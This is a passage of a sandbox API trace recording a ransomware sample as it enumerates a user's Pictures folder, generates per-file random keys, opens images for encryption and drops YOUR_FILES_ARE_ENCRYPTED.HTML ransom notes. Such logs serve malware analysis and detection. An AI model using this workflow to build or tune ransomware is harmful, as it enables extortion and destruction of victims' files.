param_1="F1") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="92") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="06") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="42") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="3B") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="32") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="3C") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="AB") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="28") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="06") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="08") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="37") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="57") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="2E") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="BE") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="E4") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="A4") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="56") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="1A") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="35") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="57") returned 2 [0125.117] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\ZttDQzAe7v0sT1.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\ZttDQzAe7v0sT1.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\ZttDQzAe7v0sT1.png" [0125.117] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.117] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.120] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4a9e680, ftCreationTime.dwHighDateTime=0x1d704c7, ftLastAccessTime.dwLowDateTime=0x96593c30, ftLastAccessTime.dwHighDateTime=0x1d704f8, ftLastWriteTime.dwLowDateTime=0x96593c30, ftLastWriteTime.dwHighDateTime=0x1d704f8, nFileSizeHigh=0x0, nFileSizeLow=0x15985, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="ZttDQzAe7v0sT1.png", cAlternateFileName="ZTTDQZ~1.PNG")) returned 0 [0125.120] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0125.121] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0125.121] GetProcessHeap () returned 0x600000 [0125.121] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0125.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0125.122] WriteFile (in: hFile=0x328, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0125.123] CloseHandle (hObject=0x328) returned 1 [0125.123] GetProcessHeap () returned 0x600000 [0125.123] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0125.123] GetProcessHeap () returned 0x600000 [0125.123] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0125.125] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad5ad20, ftCreationTime.dwHighDateTime=0x1d6fc05, ftLastAccessTime.dwLowDateTime=0x13d51960, ftLastAccessTime.dwHighDateTime=0x1d706e1, ftLastWriteTime.dwLowDateTime=0x13d51960, ftLastWriteTime.dwHighDateTime=0x1d706e1, nFileSizeHigh=0x0, nFileSizeLow=0x1124a, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="9jTVmBxlxTGHgO4r.jpg", cAlternateFileName="9JTVMB~1.JPG")) returned 1 [0125.125] StrStrIW (lpFirst="9jTVmBxlxTGHgO4r.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.125] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\9jTVmBxlxTGHgO4r.jpg") returned 55 [0125.125] PathFindExtensionW (pszPath="9jTVmBxlxTGHgO4r.jpg") returned=".jpg" [0125.125] lstrlenW (lpString=".jpg") returned 4 [0125.125] PathFindExtensionW (pszPath="9jTVmBxlxTGHgO4r.jpg") returned=".jpg" [0125.125] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\9jTVmBxlxTGHgO4r.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\9jtvmbxlxtghgo4r.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0125.125] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=70218) returned 1 [0125.125] GetProcessHeap () returned 0x600000 [0125.126] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.128] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="F2") returned 2 [0125.128] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="00") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="7D") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="E5") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="86") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="4A") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="F4") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="56") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="6C") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="BB") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="94") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="47") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="E7") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="CE") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="FA") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="08") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="48") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="CB") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="02") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="73") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="88") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="F4") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="D6") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="36") returned 2 [0125.128] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="0D") returned 2 [0125.129] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="4A") returned 2 [0125.146] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="27") returned 2 [0125.146] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="9C") returned 2 [0125.146] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="47") returned 2 [0125.146] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="CA") returned 2 [0125.146] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="38") returned 2 [0125.146] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="5F") returned 2 [0125.147] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\9jTVmBxlxTGHgO4r.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\9jTVmBxlxTGHgO4r.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\9jTVmBxlxTGHgO4r.jpg" [0125.147] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.147] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.152] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8893510, ftCreationTime.dwHighDateTime=0x1d70519, ftLastAccessTime.dwLowDateTime=0x47b4ec60, ftLastAccessTime.dwHighDateTime=0x1d70579, ftLastWriteTime.dwLowDateTime=0x47b4ec60, ftLastWriteTime.dwHighDateTime=0x1d70579, nFileSizeHigh=0x0, nFileSizeLow=0x3ac8, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="a 6Fm_SAUswBQu.bmp", cAlternateFileName="A6FM_S~1.BMP")) returned 1 [0125.152] StrStrIW (lpFirst="a 6Fm_SAUswBQu.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.152] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\a 6Fm_SAUswBQu.bmp") returned 53 [0125.152] PathFindExtensionW (pszPath="a 6Fm_SAUswBQu.bmp") returned=".bmp" [0125.152] lstrlenW (lpString=".bmp") returned 4 [0125.152] PathFindExtensionW (pszPath="a 6Fm_SAUswBQu.bmp") returned=".bmp" [0125.152] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\a 6Fm_SAUswBQu.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\a 6fm_sauswbqu.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0125.153] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=15048) returned 1 [0125.153] GetProcessHeap () returned 0x600000 [0125.153] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.155] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="39") returned 2 [0125.155] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="6C") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="B4") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="F5") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="5D") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="81") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="9A") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="C0") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="C3") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="AE") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="A0") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="CF") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="AD") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="52") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="92") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="1F") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="BB") returned 2 [0125.155] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="CE") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="6D") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="3E") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="AE") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="97") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="9A") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="66") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="F2") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="7C") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="A4") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="F9") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="23") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="8B") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="3F") returned 2 [0125.156] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="58") returned 2 [0125.157] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\a 6Fm_SAUswBQu.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\a 6Fm_SAUswBQu.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\a 6Fm_SAUswBQu.bmp" [0125.157] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.157] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.160] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c86e20, ftCreationTime.dwHighDateTime=0x1d702f2, ftLastAccessTime.dwLowDateTime=0xbc95f530, ftLastAccessTime.dwHighDateTime=0x1d7073e, ftLastWriteTime.dwLowDateTime=0xbc95f530, ftLastWriteTime.dwHighDateTime=0x1d7073e, nFileSizeHigh=0x0, nFileSizeLow=0xe3cd, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Bm7ROz.bmp", cAlternateFileName="")) returned 1 [0125.160] StrStrIW (lpFirst="Bm7ROz.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.160] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Bm7ROz.bmp") returned 45 [0125.160] PathFindExtensionW (pszPath="Bm7ROz.bmp") returned=".bmp" [0125.160] lstrlenW (lpString=".bmp") returned 4 [0125.160] PathFindExtensionW (pszPath="Bm7ROz.bmp") returned=".bmp" [0125.160] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Bm7ROz.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\bm7roz.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0125.161] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=58317) returned 1 [0125.161] GetProcessHeap () returned 0x600000 [0125.161] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.161] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="4B") returned 2 [0125.161] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="72") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="A3") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="95") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="4C") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="01") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="68") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="1C") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="5E") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="1A") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="8E") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="0E") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="1E") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="CD") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="53") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="65") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="5D") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="A6") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="E8") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="F9") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="4D") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="35") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="F8") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="49") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="17") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="5D") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="D3") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="6C") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="79") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="77") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="C2") returned 2 [0125.162] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="36") returned 2 [0125.163] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Bm7ROz.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Bm7ROz.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Bm7ROz.bmp" [0125.163] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.163] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.168] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac6a8c0, ftCreationTime.dwHighDateTime=0x1d70124, ftLastAccessTime.dwLowDateTime=0x47398600, ftLastAccessTime.dwHighDateTime=0x1d70a07, ftLastWriteTime.dwLowDateTime=0x47398600, ftLastWriteTime.dwHighDateTime=0x1d70a07, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="C9WQy_h", cAlternateFileName="")) returned 1 [0125.168] StrStrIW (lpFirst="C9WQy_h", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.168] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h") returned 42 [0125.168] GetProcessHeap () returned 0x600000 [0125.168] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0125.170] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h" [0125.170] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\*" [0125.170] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac6a8c0, ftCreationTime.dwHighDateTime=0x1d70124, ftLastAccessTime.dwLowDateTime=0x47398600, ftLastAccessTime.dwHighDateTime=0x1d70a07, ftLastWriteTime.dwLowDateTime=0x47398600, ftLastWriteTime.dwHighDateTime=0x1d70a07, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0125.170] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac6a8c0, ftCreationTime.dwHighDateTime=0x1d70124, ftLastAccessTime.dwLowDateTime=0x47398600, ftLastAccessTime.dwHighDateTime=0x1d70a07, ftLastWriteTime.dwLowDateTime=0x47398600, ftLastWriteTime.dwHighDateTime=0x1d70a07, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="..", cAlternateFileName="")) returned 1 [0125.170] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x928dca40, ftCreationTime.dwHighDateTime=0x1d70411, ftLastAccessTime.dwLowDateTime=0x30e8bcc0, ftLastAccessTime.dwHighDateTime=0x1d7070c, ftLastWriteTime.dwLowDateTime=0x30e8bcc0, ftLastWriteTime.dwHighDateTime=0x1d7070c, nFileSizeHigh=0x0, nFileSizeLow=0x16d94, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="2kDg spxPqaDX4dJd2b.bmp", cAlternateFileName="2KDGSP~1.BMP")) returned 1 [0125.170] StrStrIW (lpFirst="2kDg spxPqaDX4dJd2b.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.170] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\2kDg spxPqaDX4dJd2b.bmp") returned 66 [0125.170] PathFindExtensionW (pszPath="2kDg spxPqaDX4dJd2b.bmp") returned=".bmp" [0125.170] lstrlenW (lpString=".bmp") returned 4 [0125.170] PathFindExtensionW (pszPath="2kDg spxPqaDX4dJd2b.bmp") returned=".bmp" [0125.170] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\2kDg spxPqaDX4dJd2b.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\c9wqy_h\\2kdg spxpqadx4djd2b.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.171] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=93588) returned 1 [0125.171] GetProcessHeap () returned 0x600000 [0125.171] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.172] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="DF") returned 2 [0125.173] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="59") returned 2 [0125.173] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="73") returned 2 [0125.173] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="91") returned 2 [0125.173] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="FA") returned 2 [0125.173] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="65") returned 2 [0125.173] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="6A") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="36") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="68") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="7B") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="5D") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: 